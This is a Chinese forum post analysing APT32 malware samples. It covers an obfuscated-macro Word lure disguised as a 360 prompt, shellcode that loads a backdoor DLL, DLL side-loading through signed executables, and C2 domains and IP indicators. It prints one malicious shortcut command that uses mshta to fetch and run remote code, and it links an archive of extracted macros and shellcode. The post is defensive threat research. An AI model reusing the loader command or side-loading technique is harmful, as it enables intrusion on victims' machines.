-
-
[原创]APT32组织攻击样本分析报告系列-第三篇
-
2020-5-18 19:19
-
很久前分析的APT32组织相关的样本,稍微整理下分析相关的材料(包括IDA7.0的idb文件、提取的宏文件、解混淆后的宏文件、调试shellcode代码),发出来给朋友们参考参考。希望能给大家一点点帮助!
链接: https://pan.baidu.com/s/1OYGdZ9jbH_65LTwDtpiczQ 提取码: ak4q
注:这篇分析报告不太完整,没找到最终版!
1.2.5 分析{A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll
1 附件3:2019年度绩效审计工作计划清单.doc
1.1 基本信息
样本MD5 | bb3306543ff67189dfe9372bb3c72712 |
样本名 | |
样本文件大小 | 3.29 MB (3,449,856 字节) |
样本类型 | 后门程序 |
样本描述 | 利用Office恶意宏加载木马模块 |
分析时间 | 2019年2月 |
1.2 分析
1.2.1 简介
该恶意文档,共被植入了三段恶意宏代码,宏的主要功能为在内存中加载执行该恶意文档中以十六进制流方式储存的Shellcode代码。
ShellCode部分的功能是从自身中提取出一个DLL木马程序{A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll,接着执行此Dll的导出函数DllEntry,在内存中释放两个2个网络通信相关的DLL文件,网络通信相关文件用于支持HTTP、HTTPS和UDP协议通信,最终与C2端建立通信连接来接受控制指令。
注:{A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll名称与以前分析的某个APT32样本DLL名称一致、且Shellcode代码混淆方式类似、内存加载方式类似,因此判断此批样本与APT32相关。
1.2.2 诱骗执行
本次攻击时使用恶意宏代码的方式来加载恶意模块,并通过社会工程学的方式伪装成360的提示信息来博取用户的信任,从而诱骗用户启用恶意宏代码。
1.2.3 恶意宏分析
该恶意文档中共被植入了三段恶意宏代码,第一段代码保存在office默认位置,第二、第三段恶意宏代码以十六进制流的方式保存在文档首部。
宏代码已经过严重的混淆,用于干扰分析人员及杀毒人员的分析。
第一段宏代码(最开始执行的宏代码),从文档首部读取十六进制流保存的第二段宏代码,动态加载并调用入口函数x_N0th1ngH3r3()。
第二段宏代码,从文档首部读取十六进制流保存的第三段宏代码,动态加载并调用入口函数x_N0th1ngH3r3 ()。
第三段宏代码,通过给WINWORD进程创建远程线程的方式在内存中加载该恶意文档中以十六进制流方式储存的Shellcode代码。
1.2.4 shellcode恶意代码分析
ShellCode的核心功能是从自身中提取出一个DLL文件,并在内存中自加载此DLL,随后执行此dll的导出函数DllEntry。下图为修正后的PE头数据:
将Shellcode文件从内存中Dump出来后,使用LordPE可以看出文件的导出名为:{A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll。如下图:
1.2.5 分析{A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll
解密出的DLL的资源中有一个加密的资源文件:
该DLL运行时,首先获取该资源文件,进行解密,解密后的资源文件中包含了木马配置信息和2个网络通信相关的DLL文件,网络通信相关文件用于支持HTTP、HTTPS和UDP协议通信。下图为解密后的资源文件信息:
资源的数据结构如下:
1. Unicode字符串,"ghijklmnopz" 2. Unicode字符串,注册表键值"SOFTWARE\App\AppX70162486c7554f7f80f481985d67586d\Applicationz" 3. Unicode字符串,注册表键值"SOFTWARE\App\AppX70162486c7554f7f80f481985d67586d\DefaultIcon" 4. Unicode字符串,"Data" 5. Unicode字符串,"def" 6. C2,cloud.360cn.info 7. C2,dns.chinanews.network 8. C2,aliexpresscn.net 9. C2,chinaport.org 10. 2个网络通信相关的DLL文件 |
1.2.6 通信分析
通过{A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll文件资源中解密出的C2域名解析地址45.122.138.31建立通信连接,并使用HTTP协议中的POST方法向C2端发送上线通知,最终接受C2端的控制端指令来控制目标终端。
1.2.7 后门功能分析
l 创建进程
l 创建目录、删除目录
l 文件搜索、读写、创建、删除文件等操作
l 注册表读写操作
1.2.8 IOC
45.122.138.31:80
45.122.138.31:28194
cloud.360cn.info
dns.chinanews.network
aliexpresscn.net
chinaport.org
2 快捷方式加载木马类
2019年第一季度工作方向附表.doc.lnk、更新数据.lnk、2019年第一季度工作方向附表.lnk等几个快捷方式病毒,都是通过命令行“C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html”来加载保存在云端的木马程序,因云端已失连,导致无法分析。
3 附件3:2019年度绩效审计工作计划清单.EXE
3.1 基本信息
样本MD5 | ceaa5817a65e914aa178b28f12359a46 |
样本名 | 附件3:2019年度绩效审计工作计划清单.EXE |
样本文件大小 | 3.29 MB (3,449,856 字节) |
样本类型 | 后门程序 |
样本描述 | |
分析时间 | 2019年2月 |
3.2 分析
3.2.1 简介
3.2.2 白加黑利用
典型的白加黑利用技术,"附件3:2019年度绩效审计工作计划清单.EXE"是office的白程序,并带有数字签名,原始名为WinWord.exe,。该白exe运行后会自动加载木马文件wwlib.dll。
"C:\ProgramData\360seMaintenance"目录下释放360se.exe、chrome_elf.dll 2个文件。其中360se.exe带有效签名,原始名为360se.exe,这是典型的白加黑利用技术,带有效签名的exe运行后会自动加载木马文件chrome_elf.dll。
获取系统所在目录的盘符
拼接路径,系统盘符+"\ProgramData\360seMaintenance\"
判断目录"C\ProgramData\360seMaintenance\"是否存在,不存在则创建该目录
将保存在保存在wwlib.dll中的360se.exe、chrome_elf.dll文件释放到"C:\ProgramData\360seMaintenance"目录,
在临时目录释放用于欺骗用户的doc文档。
"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\附件3:2019年度绩效审计工作计划清单.docx /o "%u"
3.2.5 IOC
45.122.138.31:80
45.122.138.31:28194
cloud.360cn.info
dns.chinanews.network
aliexpresscn.net
chinaport.org
[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。
|
|
|---|---|
|
|
|
|
|
|
|
|
动静态配合分析...... |
|
|
|
